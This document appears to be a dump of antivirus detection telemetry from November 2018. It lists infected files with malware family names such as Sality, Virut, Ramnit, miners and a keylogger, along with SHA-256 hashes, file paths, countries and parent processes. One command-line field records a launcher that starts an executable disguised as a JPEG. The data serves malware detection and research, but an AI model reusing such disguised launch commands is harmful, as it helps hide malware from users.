  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{41DAC09B-FB49-46EA-8D2F-25AE23B309D2} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T10:29:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered sirif', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered sirif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='6d0956becde79707bc2822ca4e6de56fc8b1228145d7ba62c2dfaea6064628ed', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:31:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-001456-7d3e0391', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_56558570\\AVSCAN-20181105-000934-5B9BEDE8\\AVSCAN-20181105-001456-7D3E0391', filesize=256000, name='TR/Agent.9c4d03.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T20:44:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T17:49:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='grim-qt-v1.2.1.exe', filepath='h:\\grim-qt-v1.2.1.exe', filesize=24896000, name='SPR/Agent.9fdf39.#M1.#R1'), hash='9fdf3947705b39ed43f38747463992c3668cae612340049c71f4b4a630f12f51', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T07:49:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered codas', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered codas', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='1e054b0e49b4ec2b7fda968c1089d240a94880ed8917dda7b7e0285db40634b9', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T20:54:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='league of legends.exe', filepath='\\\\?\\F:\\Garena\\32787\\Game\\League of Legends.exe', filesize=25808000, name='W32/Sality.AT.#M1.#R1'), hash='51b2fabe9572f58cfc7f838f381d06678e8c22b48fe22125e85a5daaf6028635', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:00:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe671_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe671 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T02:52:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-07-39-33.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T12:49:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Mining\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-11-44-36.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T06:06:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00023d82', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00023d82', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:41:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:24:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T23:37:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000161', filepath='C:\\Windows\\Temp\\tmp00000258\\tmp00000161', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T13:58:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-210339-7ea575ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-210339-7EA575FF', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cpu_id.exe', filepath='e:\\packardbell yedek\\masaustusonhali\\setupsmuhendislik\\mathcad14\\mathcad\\program files\\mathcad\\mathcad 14\\cpu_id.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='ad66738b1ae36680beb447e692d641671d2fb2d77976998fe2471d8a0473739b', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T19:38:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-202455-9974ecb6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_22eb4753\\AVSCAN-20181104-202358-8F929DFB\\AVSCAN-20181104-202455-9974ECB6', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:44:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='worm.exe', filepath='\\?\\J:\\الارنب الجرء\\ارنوب\\WORM.EXE', filesize=1152000, name='W32/Virut.Gen.#M1.#R1'), hash='3a7aca692f42fd2f23386918579a007b22dde97c01afaa6fc02dc0d5d4268075', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:28:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion[1].dll', filepath='C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\5EFH1S1L\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:16:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215345-9c5a65e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-214003-0813A641\\AVSCAN-20181104-215345-9C5A65E6', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:53:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dsci5271.jpg', filepath='G:\\AdobeReader\\DSCI5271.jpg', filesize=64000, name='HEUR/AGEN.1023222.#M1.#R1'), hash='a09acd301f409d557e76ce8e3d5e0aec136d67c2a1863e94f826703354261938', metadata=Row(cmdline='\\\\\\/c \\\\\\"start %cd%AdobeReader\\\\\\\\DSCI5271.jpg -us&&C:\\\\\\\\Windows\\\\\\\\explorer.exe %cd%10.26.2018\\\\\\"', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\cmd.exe', parentsize=301568, timestamp='2018-11-04T12:53:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T09:59:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140229-eeddbf3d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140229-EEDDBF3D', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:33:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='000000.exe', filepath='d:\\games\\000000\\000000.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:43:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sfml2.exe', filepath='C:\\Users\\X\\Desktop\\SFML2_AGAIN\\SFML2\\x64\\Debug\\SFML2.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='b40218ab86e18c097ce92f38239d3b3674793fcd7953bfe406709f9333a46c48', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Microsoft Visual Studio\\2017\\Community\\Common7\\IDE\\Remote Debugger\\x64\\msvsmon.exe', parentsize=4840568, timestamp='2018-11-04T10:00:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163804-583a182c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_12cb16c6\\AVSCAN-20181104-163727-5322CCE3\\AVSCAN-20181104-163804-583A182C', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='47333a5fff555669fc1839f69f5e866732216ec9e3f332b2c218194ce682aa04', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:37:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='formshomepage.html', filepath='C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsHomePage.html', filesize=256000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='2e7bfe3befe455d77675e4d0f55c650f17e08d841dfadd22f065475ef40c2d5e', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T11:11:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d3dx9.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$DIa2200.30489\\d3dx9.dll', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\VAPE 2.47 CRACKED.rar\\\\\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1521880, timestamp='2018-11-04T22:50:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:06:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='test.exe', filepath='D:\\Test.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-073217-7ffef77d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c233db1\\AVSCAN-20181104-073158-7CCB8AE0\\AVSCAN-20181104-073217-7FFEF77D', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='65db021477c147d837ca7b06a395104cc6bcd8fab939c25ff344153710aabfc2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T06:32:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='elodrawmultimon.exe', filepath='C:\\Program Files\\Elo Touch Solutions\\EloDrawMultiMon.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='6fe70782008b47c5ca536cdac011b4fb40787feee4d8b9ec873879c303b33c75', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T22:34:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-144900-b14fe71a', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_5b89e992\\AVSCAN-20181104-144427-80344E91\\AVSCAN-20181104-144900-B14FE71A', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:50:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\adberdr707_es_es.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201305-0147fe80', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e186474e\\AVSCAN-20181102-201018-EC3C528C\\AVSCAN-20181102-201305-0147FE80', filesize=3200000, name='HEUR/AGEN.1035084.#M1.#R1'), hash='df60313db2a35ef52b9925d233ee8036d349ccaec47fe4762ff48246b46846fb', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:12:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:49:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{C6400109-EEBE-4606-AEC6-F49F93BB5F65} S-1-5-18:NT AUTHORITY\\\\System:Service:', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T10:06:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-185808-bfeb4718', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_47829443\\AVSCAN-20181102-183917-EDB97240\\AVSCAN-20181102-185808-BFEB4718', filesize=384000, name='Adware/AD.Zdengo.A.#M1.#R1'), hash='c76279310e007b844360eb7c0ebfae9a58e5bbf00aba5241503d4affb09d1d1b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:58:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-02T17:33:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='\\\\?\\C:\\Windows\\Temp\\nsu5BF5.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hfcpjrea.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\hfCpJREa.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:31:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:21:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T06:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meterpreter-32.exe', filepath='C:\\metasploit-framework\\meterpreter-32.exe', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R510'), hash='9792e43437f8d5f0f64f2164d17a1eb3481b776e36d0c4275fada175c9ae7803', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:16:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105456-b42c5fa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-105456-B42C5FA0', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='d660a3400cc7e555e7166444099e5b646ed502c2e4d073ff0d20dff34cef3eaf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:56:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='prst.dll', filepath='F:\\Users\\X\\AppData\\Local\\Temp\\sega\\Prst.dll', filesize=128000, name='TR/SPY.KeyLogger.zakea.#M1.#R1'), hash='a5ed6f4644f888a56ed7c57c53fbb6f1f7a49454db4c09a58fc6617a29b7cb1f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:47:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:39:22Z'), dt=datetime.date(2018, 11, 2)),
